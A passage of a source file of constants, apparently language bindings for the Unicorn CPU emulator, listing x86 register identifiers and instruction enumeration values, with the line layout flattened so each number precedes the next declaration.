196 let UC_X86_REG_ZMM11 = 197 let UC_X86_REG_ZMM12 = 198 let UC_X86_REG_ZMM13 = 199 let UC_X86_REG_ZMM14 = 200 let UC_X86_REG_ZMM15 = 201 let UC_X86_REG_ZMM16 = 202 let UC_X86_REG_ZMM17 = 203 let UC_X86_REG_ZMM18 = 204 let UC_X86_REG_ZMM19 = 205 let UC_X86_REG_ZMM20 = 206 let UC_X86_REG_ZMM21 = 207 let UC_X86_REG_ZMM22 = 208 let UC_X86_REG_ZMM23 = 209 let UC_X86_REG_ZMM24 = 210 let UC_X86_REG_ZMM25 = 211 let UC_X86_REG_ZMM26 = 212 let UC_X86_REG_ZMM27 = 213 let UC_X86_REG_ZMM28 = 214 let UC_X86_REG_ZMM29 = 215 let UC_X86_REG_ZMM30 = 216 let UC_X86_REG_ZMM31 = 217 let UC_X86_REG_R8B = 218 let UC_X86_REG_R9B = 219 let UC_X86_REG_R10B = 220 let UC_X86_REG_R11B = 221 let UC_X86_REG_R12B = 222 let UC_X86_REG_R13B = 223 let UC_X86_REG_R14B = 224 let UC_X86_REG_R15B = 225 let UC_X86_REG_R8D = 226 let UC_X86_REG_R9D = 227 let UC_X86_REG_R10D = 228 let UC_X86_REG_R11D = 229 let UC_X86_REG_R12D 
= 230 let UC_X86_REG_R13D = 231 let UC_X86_REG_R14D = 232 let UC_X86_REG_R15D = 233 let UC_X86_REG_R8W = 234 let UC_X86_REG_R9W = 235 let UC_X86_REG_R10W = 236 let UC_X86_REG_R11W = 237 let UC_X86_REG_R12W = 238 let UC_X86_REG_R13W = 239 let UC_X86_REG_R14W = 240 let UC_X86_REG_R15W = 241 let UC_X86_REG_IDTR = 242 let UC_X86_REG_GDTR = 243 let UC_X86_REG_LDTR = 244 let UC_X86_REG_TR = 245 let UC_X86_REG_FPCW = 246 let UC_X86_REG_FPTAG = 247 let UC_X86_REG_MSR = 248 let UC_X86_REG_MXCSR = 249 let UC_X86_REG_FS_BASE = 250 let UC_X86_REG_GS_BASE = 251 let UC_X86_REG_FLAGS = 252 let UC_X86_REG_RFLAGS = 253 let UC_X86_REG_FIP = 254 let UC_X86_REG_FCS = 255 let UC_X86_REG_FDP = 256 let UC_X86_REG_FDS = 257 let UC_X86_REG_FOP = 258 let UC_X86_REG_ENDING = 259 // X86 instructions let UC_X86_INS_INVALID = 0 let UC_X86_INS_AAA = 1 let UC_X86_INS_AAD = 2 let UC_X86_INS_AAM = 3 let UC_X86_INS_AAS = 4 let UC_X86_INS_FABS = 5 let UC_X86_INS_ADC = 6 let UC_X86_INS_ADCX = 7 let UC_X86_INS_ADD = 8 let UC_X86_INS_ADDPD = 9 let UC_X86_INS_ADDPS = 10 let UC_X86_INS_ADDSD = 11 let UC_X86_INS_ADDSS = 12 let UC_X86_INS_ADDSUBPD = 13 let UC_X86_INS_ADDSUBPS = 14 let UC_X86_INS_FADD = 15 let UC_X86_INS_FIADD = 16 let UC_X86_INS_FADDP = 17 let UC_X86_INS_ADOX = 18 let UC_X86_INS_AESDECLAST = 19 let UC_X86_INS_AESDEC = 20 let UC_X86_INS_AESENCLAST = 21 let UC_X86_INS_AESENC = 22 let UC_X86_INS_AESIMC = 23 let UC_X86_INS_AESKEYGENASSIST = 24 let UC_X86_INS_AND = 25 let UC_X86_INS_ANDN = 26 let UC_X86_INS_ANDNPD = 27 let UC_X86_INS_ANDNPS = 28 let UC_X86_INS_ANDPD = 29 let UC_X86_INS_ANDPS = 30 let UC_X86_INS_ARPL = 31 let UC_X86_INS_BEXTR = 32 let UC_X86_INS_BLCFILL = 33 let UC_X86_INS_BLCI = 34 let UC_X86_INS_BLCIC = 35 let UC_X86_INS_BLCMSK = 36 let UC_X86_INS_BLCS = 37 let UC_X86_INS_BLENDPD = 38 let UC_X86_INS_BLENDPS = 39 let UC_X86_INS_BLENDVPD = 40 let UC_X86_INS_BLENDVPS = 41 let UC_X86_INS_BLSFILL = 42 let UC_X86_INS_BLSI = 43 let UC_X86_INS_BLSIC = 44 let UC_X86_INS_BLSMSK = 45 let UC_X86_INS_BLSR = 46 let UC_X86_INS_BOUND = 47 let UC_X86_INS_BSF = 48 let UC_X86_INS_BSR = 49 let UC_X86_INS_BSWAP = 50 let UC_X86_INS_BT = 51 let UC_X86_INS_BTC = 52 let UC_X86_INS_BTR = 53 let UC_X86_INS_BTS = 54 let UC_X86_INS_BZHI = 55 let UC_X86_INS_CALL = 56 let UC_X86_INS_CBW = 57 let UC_X86_INS_CDQ = 58 let UC_X86_INS_CDQE = 59 let UC_X86_INS_FCHS = 60 let UC_X86_INS_CLAC = 61 let UC_X86_INS_CLC = 62 let UC_X86_INS_CLD = 63 let UC_X86_INS_CLFLUSH = 64 let UC_X86_INS_CLFLUSHOPT = 65 let UC_X86_INS_CLGI = 66 let UC_X86_INS_CLI = 67 let UC_X86_INS_CLTS = 68 let UC_X86_INS_CLWB = 69 let UC_X86_INS_CMC = 70 let UC_X86_INS_CMOVA = 71 let UC_X86_INS_CMOVAE = 72 let UC_X86_INS_CMOVB = 73 let UC_X86_INS_CMOVBE = 74 let UC_X86_INS_FCMOVBE = 75 let UC_X86_INS_FCMOVB = 76 let UC_X86_INS_CMOVE = 77 let UC_X86_INS_FCMOVE = 78 let UC_X86_INS_CMOVG = 79 let UC_X86_INS_CMOVGE = 80 let UC_X86_INS_CMOVL = 81 let UC_X86_INS_CMOVLE = 82 let UC_X86_INS_FCMOVNBE = 83 let UC_X86_INS_FCMOVNB = 84 let UC_X86_INS_CMOVNE = 85 let UC_X86_INS_FCMOVNE = 86 let UC_X86_INS_CMOVNO = 87 let UC_X86_INS_CMOVNP = 88 let UC_X86_INS_FCMOVNU = 89 let UC_X86_INS_CMOVNS = 90 let UC_X86_INS_CMOVO = 91 let UC_X86_INS_CMOVP = 92 let UC_X86_INS_FCMOVU = 93 let UC_X86_INS_CMOVS = 94 let UC_X86_INS_CMP = 95 let UC_X86_INS_CMPPD = 96 let UC_X86_INS_CMPPS = 97 let UC_X86_INS_CMPSB = 98 let UC_X86_INS_CMPSD = 99 let UC_X86_INS_CMPSQ = 100 let UC_X86_INS_CMPSS = 101 let UC_X86_INS_CMPSW = 102 let UC_X86_INS_CMPXCHG16B = 103 let UC_X86_INS_CMPXCHG = 104 let 
UC_X86_INS_CMPXCHG8B = 105 let UC_X86_INS_COMISD = 106 let UC_X86_INS_COMISS = 107 let UC_X86_INS_FCOMP = 108 let UC_X86_INS_FCOMPI = 109 let UC_X86_INS_FCOMI = 110 let UC_X86_INS_FCOM = 111 let UC_X86_INS_FCOS = 112 let UC_X86_INS_CPUID = 113 let UC_X86_INS_CQO = 114 let UC_X86_INS_CRC32 = 115 let UC_X86_INS_CVTDQ2PD = 116 let UC_X86_INS_CVTDQ2PS = 117 let UC_X86_INS_CVTPD2DQ = 118 let UC_X86_INS_CVTPD2PS = 119 let UC_X86_INS_CVTPS2DQ = 120 let UC_X86_INS_CVTPS2PD = 121 let UC_X86_INS_CVTSD2SI = 122 let UC_X86_INS_CVTSD2SS = 123 let UC_X86_INS_CVTSI2SD = 124 let UC_X86_INS_CVTSI2SS = 125 let UC_X86_INS_CVTSS2SD = 126 let UC_X86_INS_CVTSS2SI = 127 let UC_X86_INS_CVTTPD2DQ = 128 let UC_X86_INS_CVTTPS2DQ = 129 let UC_X86_INS_CVTTSD2SI = 130 let UC_X86_INS_CVTTSS2SI = 131 let UC_X86_INS_CWD = 132 let UC_X86_INS_CWDE = 133 let UC_X86_INS_DAA = 134 let UC_X86_INS_DAS = 135 let UC_X86_INS_DATA16 = 136 let UC_X86_INS_DEC = 137 let UC_X86_INS_DIV = 138 let UC_X86_INS_DIVPD = 139 let UC_X86_INS_DIVPS = 140 let UC_X86_INS_FDIVR = 141 let UC_X86_INS_FIDIVR = 142 let UC_X86_INS_FDIVRP = 143 let UC_X86_INS_DIVSD = 144 let UC_X86_INS_DIVSS = 145 let UC_X86_INS_FDIV = 146 let UC_X86_INS_FIDIV = 147 let UC_X86_INS_FDIVP = 148 let UC_X86_INS_DPPD = 149 let UC_X86_INS_DPPS = 150 let UC_X86_INS_RET = 151 let UC_X86_INS_ENCLS = 152 let UC_X86_INS_ENCLU = 153 let UC_X86_INS_ENTER = 154 let UC_X86_INS_EXTRACTPS = 155 let UC_X86_INS_EXTRQ = 156 let UC_X86_INS_F2XM1 = 157 let UC_X86_INS_LCALL = 158 let UC_X86_INS_LJMP = 159 let UC_X86_INS_FBLD = 160 let UC_X86_INS_FBSTP = 161 let UC_X86_INS_FCOMPP = 162 let UC_X86_INS_FDECSTP = 163 let UC_X86_INS_FEMMS = 164 let UC_X86_INS_FFREE = 165 let UC_X86_INS_FICOM = 166 let UC_X86_INS_FICOMP = 167 let UC_X86_INS_FINCSTP = 168 let UC_X86_INS_FLDCW = 169 let UC_X86_INS_FLDENV = 170 let UC_X86_INS_FLDL2E = 171 let UC_X86_INS_FLDL2T = 172 let UC_X86_INS_FLDLG2 = 173 let UC_X86_INS_FLDLN2 = 174 let UC_X86_INS_FLDPI = 175 let UC_X86_INS_FNCLEX = 176 let UC_X86_INS_FNINIT = 177 let UC_X86_INS_FNOP = 178 let UC_X86_INS_FNSTCW = 179 let UC_X86_INS_FNSTSW = 180 let UC_X86_INS_FPATAN = 181 let UC_X86_INS_FPREM = 182 let UC_X86_INS_FPREM1 = 183 let UC_X86_INS_FPTAN = 184 let UC_X86_INS_FFREEP = 185 let UC_X86_INS_FRNDINT = 186 let UC_X86_INS_FRSTOR = 187 let UC_X86_INS_FNSAVE = 188 let UC_X86_INS_FSCALE = 189 let UC_X86_INS_FSETPM = 190 let UC_X86_INS_FSINCOS = 191 let UC_X86_INS_FNSTENV = 192 let UC_X86_INS_FXAM = 193 let UC_X86_INS_FXRSTOR = 194 let UC_X86_INS_FXRSTOR64 = 195 let UC_X86_INS_FXSAVE = 196 let UC_X86_INS_FXSAVE64 = 197 let UC_X86_INS_FXTRACT = 198 let UC_X86_INS_FYL2X = 199 let UC_X86_INS_FYL2XP1 = 200 let UC_X86_INS_MOVAPD = 201 let UC_X86_INS_MOVAPS = 202 let UC_X86_INS_ORPD = 203 let UC_X86_INS_ORPS = 204 let UC_X86_INS_VMOVAPD = 205 let UC_X86_INS_VMOVAPS = 206 let UC_X86_INS_XORPD = 207 let UC_X86_INS_XORPS = 208 let UC_X86_INS_GETSEC = 209 let UC_X86_INS_HADDPD = 210 let UC_X86_INS_HADDPS = 211 let UC_X86_INS_HLT = 212 let UC_X86_INS_HSUBPD = 213 let UC_X86_INS_HSUBPS = 214 let UC_X86_INS_IDIV = 215 let UC_X86_INS_FILD = 216 let UC_X86_INS_IMUL = 217 let UC_X86_INS_IN = 218 let UC_X86_INS_INC = 219 let UC_X86_INS_INSB = 220 let UC_X86_INS_INSERTPS = 221 let UC_X86_INS_INSERTQ = 222 let UC_X86_INS_INSD = 223 let UC_X86_INS_INSW = 224 let UC_X86_INS_INT = 225 let UC_X86_INS_INT1 = 226 let UC_X86_INS_INT3 = 227 let UC_X86_INS_INTO = 228 let UC_X86_INS_INVD = 229 let UC_X86_INS_INVEPT = 230 let UC_X86_INS_INVLPG = 231 let UC_X86_INS_INVLPGA = 232 let 
UC_X86_INS_INVPCID = 233 let UC_X86_INS_INVVPID = 234 let UC_X86_INS_IRET = 235 let UC_X86_INS_IRETD = 236 let UC_X86_INS_IRETQ = 237 let UC_X86_INS_FISTTP = 238 let UC_X86_INS_FIST = 239 let UC_X86_INS_FISTP = 240 let UC_X86_INS_UCOMISD = 241 let UC_X86_INS_UCOMISS = 242 let UC_X86_INS_VCOMISD = 243 let UC_X86_INS_VCOMISS = 244 let UC_X86_INS_VCVTSD2SS = 245 let UC_X86_INS_VCVTSI2SD = 246 let UC_X86_INS_VCVTSI2SS = 247 let UC_X86_INS_VCVTSS2SD = 248 let UC_X86_INS_VCVTTSD2SI = 249 let UC_X86_INS_VCVTTSD2USI = 250 let UC_X86_INS_VCVTTSS2SI = 251 let UC_X86_INS_VCVTTSS2USI = 252 let UC_X86_INS_VCVTUSI2SD = 253 let UC_X86_INS_VCVTUSI2SS = 254 let UC_X86_INS_VUCOMISD = 255 let UC_X86_INS_VUCOMISS = 256 let UC_X86_INS_JAE = 257 let UC_X86_INS_JA = 258 let UC_X86_INS_JBE = 259 let UC_X86_INS_JB = 260 let UC_X86_INS_JCXZ = 261 let UC_X86_INS_JECXZ = 262 let UC_X86_INS_JE = 263 let UC_X86_INS_JGE = 264 let UC_X86_INS_JG = 265 let UC_X86_INS_JLE = 266 let UC_X86_INS_JL = 267 let UC_X86_INS_JMP = 268 let UC_X86_INS_JNE = 269 let UC_X86_INS_JNO = 270 let UC_X86_INS_JNP = 271 let UC_X86_INS_JNS = 272 let UC_X86_INS_JO = 273 let UC_X86_INS_JP = 274 let UC_X86_INS_JRCXZ = 275 let UC_X86_INS_JS = 276 let UC_X86_INS_KANDB = 277 let UC_X86_INS_KANDD = 278 let UC_X86_INS_KANDNB = 279 let UC_X86_INS_KANDND = 280 let UC_X86_INS_KANDNQ = 281 let UC_X86_INS_KANDNW = 282 let UC_X86_INS_KANDQ = 283 let UC_X86_INS_KANDW = 284 let UC_X86_INS_KMOVB = 285 let UC_X86_INS_KMOVD = 286 let UC_X86_INS_KMOVQ = 287 let UC_X86_INS_KMOVW = 288 let UC_X86_INS_KNOTB = 289 let UC_X86_INS_KNOTD = 290 let UC_X86_INS_KNOTQ = 291 let UC_X86_INS_KNOTW = 292 let UC_X86_INS_KORB = 293 let UC_X86_INS_KORD = 294 let UC_X86_INS_KORQ = 295 let UC_X86_INS_KORTESTB = 296 let UC_X86_INS_KORTESTD = 297 let UC_X86_INS_KORTESTQ = 298 let UC_X86_INS_KORTESTW = 299 let UC_X86_INS_KORW = 300 let UC_X86_INS_KSHIFTLB = 301 let UC_X86_INS_KSHIFTLD = 302 let UC_X86_INS_KSHIFTLQ = 303 let UC_X86_INS_KSHIFTLW = 304 let UC_X86_INS_KSHIFTRB = 305 let UC_X86_INS_KSHIFTRD = 306 let UC_X86_INS_KSHIFTRQ = 307 let UC_X86_INS_KSHIFTRW = 308 let UC_X86_INS_KUNPCKBW = 309 let UC_X86_INS_KXNORB = 310 let UC_X86_INS_KXNORD = 311 let UC_X86_INS_KXNORQ = 312 let UC_X86_INS_KXNORW = 313 let UC_X86_INS_KXORB = 314 let UC_X86_INS_KXORD = 315 let UC_X86_INS_KXORQ = 316 let UC_X86_INS_KXORW = 317 let UC_X86_INS_LAHF = 318 let UC_X86_INS_LAR = 319 let UC_X86_INS_LDDQU = 320 let UC_X86_INS_LDMXCSR = 321 let UC_X86_INS_LDS = 322 let UC_X86_INS_FLDZ = 323 let UC_X86_INS_FLD1 = 324 let UC_X86_INS_FLD = 325 let UC_X86_INS_LEA = 326 let UC_X86_INS_LEAVE = 327 let UC_X86_INS_LES = 328 let UC_X86_INS_LFENCE = 329 let UC_X86_INS_LFS = 330 let UC_X86_INS_LGDT = 331 let UC_X86_INS_LGS = 332 let UC_X86_INS_LIDT = 333 let UC_X86_INS_LLDT = 334 let UC_X86_INS_LMSW = 335 let UC_X86_INS_OR = 336 let UC_X86_INS_SUB = 337 let UC_X86_INS_XOR = 338 let UC_X86_INS_LODSB = 339 let UC_X86_INS_LODSD = 340 let UC_X86_INS_LODSQ = 341 let UC_X86_INS_LODSW = 342 let UC_X86_INS_LOOP = 343 let UC_X86_INS_LOOPE = 344 let UC_X86_INS_LOOPNE = 345 let UC_X86_INS_RETF = 346 let UC_X86_INS_RETFQ = 347 let UC_X86_INS_LSL = 348 let UC_X86_INS_LSS = 349 let UC_X86_INS_LTR = 350 let UC_X86_INS_XADD = 351 let UC_X86_INS_LZCNT = 352 let UC_X86_INS_MASKMOVDQU = 353 let UC_X86_INS_MAXPD = 354 let UC_X86_INS_MAXPS = 355 let UC_X86_INS_MAXSD = 356 let UC_X86_INS_MAXSS = 357 let UC_X86_INS_MFENCE = 358 let UC_X86_INS_MINPD = 359 let UC_X86_INS_MINPS = 360 let UC_X86_INS_MINSD = 361 let UC_X86_INS_MINSS = 362 let 
UC_X86_INS_CVTPD2PI = 363 let UC_X86_INS_CVTPI2PD = 364 let UC_X86_INS_CVTPI2PS = 365 let UC_X86_INS_CVTPS2PI = 366 let UC_X86_INS_CVTTPD2PI = 367 let UC_X86_INS_CVTTPS2PI = 368 let UC_X86_INS_EMMS = 369 let UC_X86_INS_MASKMOVQ = 370 let UC_X86_INS_MOVD = 371 let UC_X86_INS_MOVDQ2Q = 372 let UC_X86_INS_MOVNTQ = 373 let UC_X86_INS_MOVQ2DQ = 374 let UC_X86_INS_MOVQ = 375 let UC_X86_INS_PABSB = 376 let UC_X86_INS_PABSD = 377 let UC_X86_INS_PABSW = 378 let UC_X86_INS_PACKSSDW = 379 let UC_X86_INS_PACKSSWB = 380 let UC_X86_INS_PACKUSWB = 381 let UC_X86_INS_PADDB = 382 let UC_X86_INS_PADDD = 383 let UC_X86_INS_PADDQ = 384 let UC_X86_INS_PADDSB = 385 let UC_X86_INS_PADDSW = 386 let UC_X86_INS_PADDUSB = 387 let UC_X86_INS_PADDUSW = 388 let UC_X86_INS_PADDW = 389 let UC_X86_INS_PALIGNR = 390 let UC_X86_INS_PANDN = 391 let UC_X86_INS_PAND = 392 let UC_X86_INS_PAVGB = 393 let UC_X86_INS_PAVGW = 394 let UC_X86_INS_PCMPEQB = 395 let UC_X86_INS_PCMPEQD = 396 let UC_X86_INS_PCMPEQW = 397 let UC_X86_INS_PCMPGTB = 398 let UC_X86_INS_PCMPGTD = 399 let UC_X86_INS_PCMPGTW = 400 let UC_X86_INS_PEXTRW = 401 let UC_X86_INS_PHADDSW = 402 let UC_X86_INS_PHADDW = 403 let UC_X86_INS_PHADDD = 404 let UC_X86_INS_PHSUBD = 405 let UC_X86_INS_PHSUBSW = 406 let UC_X86_INS_PHSUBW = 407 let UC_X86_INS_PINSRW = 408 let UC_X86_INS_PMADDUBSW = 409 let UC_X86_INS_PMADDWD = 410 let UC_X86_INS_PMAXSW = 411 let UC_X86_INS_PMAXUB = 412 let UC_X86_INS_PMINSW = 413 let UC_X86_INS_PMINUB = 414 let UC_X86_INS_PMOVMSKB = 415 let UC_X86_INS_PMULHRSW = 416 let UC_X86_INS_PMULHUW = 417 let UC_X86_INS_PMULHW = 418 let UC_X86_INS_PMULLW = 419 let UC_X86_INS_PMULUDQ = 420 let UC_X86_INS_POR = 421 let UC_X86_INS_PSADBW = 422 let UC_X86_INS_PSHUFB = 423 let UC_X86_INS_PSHUFW = 424 let UC_X86_INS_PSIGNB = 425 let UC_X86_INS_PSIGND = 426 let UC_X86_INS_PSIGNW = 427 let UC_X86_INS_PSLLD = 428 let UC_X86_INS_PSLLQ = 429 let UC_X86_INS_PSLLW = 430 let UC_X86_INS_PSRAD = 431 let UC_X86_INS_PSRAW = 432 let UC_X86_INS_PSRLD = 433 let UC_X86_INS_PSRLQ = 434 let UC_X86_INS_PSRLW = 435 let UC_X86_INS_PSUBB = 436 let UC_X86_INS_PSUBD = 437 let UC_X86_INS_PSUBQ = 438 let UC_X86_INS_PSUBSB = 439 let UC_X86_INS_PSUBSW = 440 let UC_X86_INS_PSUBUSB = 441 let UC_X86_INS_PSUBUSW = 442 let UC_X86_INS_PSUBW = 443 let UC_X86_INS_PUNPCKHBW = 444 let UC_X86_INS_PUNPCKHDQ = 445 let UC_X86_INS_PUNPCKHWD = 446 let UC_X86_INS_PUNPCKLBW = 447 let UC_X86_INS_PUNPCKLDQ = 448 let UC_X86_INS_PUNPCKLWD = 449 let UC_X86_INS_PXOR = 450 let UC_X86_INS_MONITOR = 451 let UC_X86_INS_MONTMUL = 452 let UC_X86_INS_MOV = 453 let UC_X86_INS_MOVABS = 454 let UC_X86_INS_MOVBE = 455 let UC_X86_INS_MOVDDUP = 456 let UC_X86_INS_MOVDQA = 457 let UC_X86_INS_MOVDQU = 458 let UC_X86_INS_MOVHLPS = 459 let UC_X86_INS_MOVHPD = 460 let UC_X86_INS_MOVHPS = 461 let UC_X86_INS_MOVLHPS = 462 let UC_X86_INS_MOVLPD = 463 let UC_X86_INS_MOVLPS = 464 let UC_X86_INS_MOVMSKPD = 465 let UC_X86_INS_MOVMSKPS = 466 let UC_X86_INS_MOVNTDQA = 467 let UC_X86_INS_MOVNTDQ = 468 let UC_X86_INS_MOVNTI = 469 let UC_X86_INS_MOVNTPD = 470 let UC_X86_INS_MOVNTPS = 471 let UC_X86_INS_MOVNTSD = 472 let UC_X86_INS_MOVNTSS = 473 let UC_X86_INS_MOVSB = 474 let UC_X86_INS_MOVSD = 475 let UC_X86_INS_MOVSHDUP = 476 let UC_X86_INS_MOVSLDUP = 477 let UC_X86_INS_MOVSQ = 478 let UC_X86_INS_MOVSS = 479 let UC_X86_INS_MOVSW = 480 let UC_X86_INS_MOVSX = 481 let UC_X86_INS_MOVSXD = 482 let UC_X86_INS_MOVUPD = 483 let UC_X86_INS_MOVUPS = 484 let UC_X86_INS_MOVZX = 485 let UC_X86_INS_MPSADBW = 486 let UC_X86_INS_MUL = 487 let UC_X86_INS_MULPD 
= 488 let UC_X86_INS_MULPS = 489 let UC_X86_INS_MULSD = 490 let UC_X86_INS_MULSS = 491 let UC_X86_INS_MULX = 492 let UC_X86_INS_FMUL = 493 let UC_X86_INS_FIMUL = 494 let UC_X86_INS_FMULP = 495 let UC_X86_INS_MWAIT = 496 let UC_X86_INS_NEG = 497 let UC_X86_INS_NOP = 498 let UC_X86_INS_NOT = 499 let UC_X86_INS_OUT = 500 let UC_X86_INS_OUTSB = 501 let UC_X86_INS_OUTSD = 502 let UC_X86_INS_OUTSW = 503 let UC_X86_INS_PACKUSDW = 504 let UC_X86_INS_PAUSE = 505 let UC_X86_INS_PAVGUSB = 506 let UC_X86_INS_PBLENDVB = 507 let UC_X86_INS_PBLENDW = 508 let UC_X86_INS_PCLMULQDQ = 509 let UC_X86_INS_PCMPEQQ = 510 let UC_X86_INS_PCMPESTRI = 511 let UC_X86_INS_PCMPESTRM = 512 let UC_X86_INS_PCMPGTQ = 513 let UC_X86_INS_PCMPISTRI = 514 let UC_X86_INS_PCMPISTRM = 515 let UC_X86_INS_PCOMMIT = 516 let UC_X86_INS_PDEP = 517 let UC_X86_INS_PEXT = 518 let UC_X86_INS_PEXTRB = 519 let UC_X86_INS_PEXTRD = 520 let UC_X86_INS_PEXTRQ = 521 let UC_X86_INS_PF2ID = 522 let UC_X86_INS_PF2IW = 523 let UC_X86_INS_PFACC = 524 let UC_X86_INS_PFADD = 525 let UC_X86_INS_PFCMPEQ = 526 let UC_X86_INS_PFCMPGE = 527 let UC_X86_INS_PFCMPGT = 528 let UC_X86_INS_PFMAX = 529 let UC_X86_INS_PFMIN = 530 let UC_X86_INS_PFMUL = 531 let UC_X86_INS_PFNACC = 532 let UC_X86_INS_PFPNACC = 533 let UC_X86_INS_PFRCPIT1 = 534 let UC_X86_INS_PFRCPIT2 = 535 let UC_X86_INS_PFRCP = 536 let UC_X86_INS_PFRSQIT1 = 537 let UC_X86_INS_PFRSQRT = 538 let UC_X86_INS_PFSUBR = 539 let UC_X86_INS_PFSUB = 540 let UC_X86_INS_PHMINPOSUW = 541 let UC_X86_INS_PI2FD = 542 let UC_X86_INS_PI2FW = 543 let UC_X86_INS_PINSRB = 544 let UC_X86_INS_PINSRD = 545 let UC_X86_INS_PINSRQ = 546 let UC_X86_INS_PMAXSB = 547 let UC_X86_INS_PMAXSD = 548 let UC_X86_INS_PMAXUD = 549 let UC_X86_INS_PMAXUW = 550 let UC_X86_INS_PMINSB = 551 let UC_X86_INS_PMINSD = 552 let UC_X86_INS_PMINUD = 553 let UC_X86_INS_PMINUW = 554 let UC_X86_INS_PMOVSXBD = 555 let UC_X86_INS_PMOVSXBQ = 556 let UC_X86_INS_PMOVSXBW = 557 let UC_X86_INS_PMOVSXDQ = 558 let UC_X86_INS_PMOVSXWD = 559 let UC_X86_INS_PMOVSXWQ = 560 let UC_X86_INS_PMOVZXBD = 561 let UC_X86_INS_PMOVZXBQ = 562 let UC_X86_INS_PMOVZXBW = 563 let UC_X86_INS_PMOVZXDQ = 564 let UC_X86_INS_PMOVZXWD = 565 let UC_X86_INS_PMOVZXWQ = 566 let UC_X86_INS_PMULDQ = 567 let UC_X86_INS_PMULHRW = 568 let UC_X86_INS_PMULLD = 569 let UC_X86_INS_POP = 570 let UC_X86_INS_POPAW = 571 let UC_X86_INS_POPAL = 572 let UC_X86_INS_POPCNT = 573 let UC_X86_INS_POPF = 574 let UC_X86_INS_POPFD = 575 let UC_X86_INS_POPFQ = 576 let UC_X86_INS_PREFETCH = 577 let UC_X86_INS_PREFETCHNTA = 578 let UC_X86_INS_PREFETCHT0 = 579 let UC_X86_INS_PREFETCHT1 = 580 let UC_X86_INS_PREFETCHT2 = 581 let UC_X86_INS_PREFETCHW = 582 let UC_X86_INS_PSHUFD = 583 let UC_X86_INS_PSHUFHW = 584 let UC_X86_INS_PSHUFLW = 585 let UC_X86_INS_PSLLDQ = 586 let UC_X86_INS_PSRLDQ = 587 let UC_X86_INS_PSWAPD = 588 let UC_X86_INS_PTEST = 589 let UC_X86_INS_PUNPCKHQDQ = 590 let UC_X86_INS_PUNPCKLQDQ = 591 let UC_X86_INS_PUSH = 592 let UC_X86_INS_PUSHAW = 593 let UC_X86_INS_PUSHAL = 594 let UC_X86_INS_PUSHF = 595 let UC_X86_INS_PUSHFD = 596 let UC_X86_INS_PUSHFQ = 597 let UC_X86_INS_RCL = 598 let UC_X86_INS_RCPPS = 599 let UC_X86_INS_RCPSS = 600 let UC_X86_INS_RCR = 601 let UC_X86_INS_RDFSBASE = 602 let UC_X86_INS_RDGSBASE = 603 let UC_X86_INS_RDMSR = 604 let UC_X86_INS_RDPMC = 605 let UC_X86_INS_RDRAND = 606 let UC_X86_INS_RDSEED = 607 let UC_X86_INS_RDTSC = 608 let UC_X86_INS_RDTSCP = 609 let UC_X86_INS_ROL = 610 let UC_X86_INS_ROR = 611 let UC_X86_INS_RORX = 612 let UC_X86_INS_ROUNDPD = 613 let 
UC_X86_INS_ROUNDPS = 614 let UC_X86_INS_ROUNDSD = 615 let UC_X86_INS_ROUNDSS = 616 let UC_X86_INS_RSM = 617 let UC_X86_INS_RSQRTPS = 618 let UC_X86_INS_RSQRTSS = 619 let UC_X86_INS_SAHF = 620 let UC_X86_INS_SAL = 621 let UC_X86_INS_SALC = 622 let UC_X86_INS_SAR = 623 let UC_X86_INS_SARX = 624 let UC_X86_INS_SBB = 625 let UC_X86_INS_SCASB = 626 let UC_X86_INS_SCASD = 627 let UC_X86_INS_SCASQ = 628 let UC_X86_INS_SCASW = 629 let UC_X86_INS_SETAE = 630 let UC_X86_INS_SETA = 631 let UC_X86_INS_SETBE = 632 let UC_X86_INS_SETB = 633 let UC_X86_INS_SETE = 634 let UC_X86_INS_SETGE = 635 let UC_X86_INS_SETG = 636 let UC_X86_INS_SETLE = 637 let UC_X86_INS_SETL = 638 let UC_X86_INS_SETNE = 639 let UC_X86_INS_SETNO = 640 let UC_X86_INS_SETNP = 641 let UC_X86_INS_SETNS = 642 let UC_X86_INS_SETO = 643 let UC_X86_INS_SETP = 644 let UC_X86_INS_SETS = 645 let UC_X86_INS_SFENCE = 646 let UC_X86_INS_SGDT = 647 let UC_X86_INS_SHA1MSG1 = 648 let UC_X86_INS_SHA1MSG2 = 649 let UC_X86_INS_SHA1NEXTE = 650 let UC_X86_INS_SHA1RNDS4 = 651 let UC_X86_INS_SHA256MSG1 = 652 let UC_X86_INS_SHA256MSG2 = 653 let UC_X86_INS_SHA256RNDS2 = 654 let UC_X86_INS_SHL = 655 let UC_X86_INS_SHLD = 656 let UC_X86_INS_SHLX = 657 let UC_X86_INS_SHR = 658 let UC_X86_INS_SHRD = 659 let UC_X86_INS_SHRX = 660 let UC_X86_INS_SHUFPD = 661 let UC_X86_INS_SHUFPS = 662 let UC_X86_INS_SIDT = 663 let UC_X86_INS_FSIN = 664 let UC_X86_INS_SKINIT = 665 let UC_X86_INS_SLDT = 666 let UC_X86_INS_SMSW = 667 let UC_X86_INS_SQRTPD = 668 let UC_X86_INS_SQRTPS = 669 let UC_X86_INS_SQRTSD = 670 let UC_X86_INS_SQRTSS = 671 let UC_X86_INS_FSQRT = 672 let UC_X86_INS_STAC = 673 let UC_X86_INS_STC = 674 let UC_X86_INS_STD = 675 let UC_X86_INS_STGI = 676 let UC_X86_INS_STI = 677 let UC_X86_INS_STMXCSR = 678 let UC_X86_INS_STOSB = 679 let UC_X86_INS_STOSD = 680 let UC_X86_INS_STOSQ = 681 let UC_X86_INS_STOSW = 682 let UC_X86_INS_STR = 683 let UC_X86_INS_FST = 684 let UC_X86_INS_FSTP = 685 let UC_X86_INS_FSTPNCE = 686 let UC_X86_INS_FXCH = 687 let UC_X86_INS_SUBPD = 688 let UC_X86_INS_SUBPS = 689 let UC_X86_INS_FSUBR = 690 let UC_X86_INS_FISUBR = 691 let UC_X86_INS_FSUBRP = 692 let UC_X86_INS_SUBSD = 693 let UC_X86_INS_SUBSS = 694 let UC_X86_INS_FSUB = 695 let UC_X86_INS_FISUB = 696 let UC_X86_INS_FSUBP = 697 let UC_X86_INS_SWAPGS = 698 let UC_X86_INS_SYSCALL = 699 let UC_X86_INS_SYSENTER = 700 let UC_X86_INS_SYSEXIT = 701 let UC_X86_INS_SYSRET = 702 let UC_X86_INS_T1MSKC = 703 let UC_X86_INS_TEST = 704 let UC_X86_INS_UD2 = 705 let UC_X86_INS_FTST = 706 let UC_X86_INS_TZCNT = 707 let UC_X86_INS_TZMSK = 708 let UC_X86_INS_FUCOMPI = 709 let UC_X86_INS_FUCOMI = 710 let UC_X86_INS_FUCOMPP = 711 let UC_X86_INS_FUCOMP = 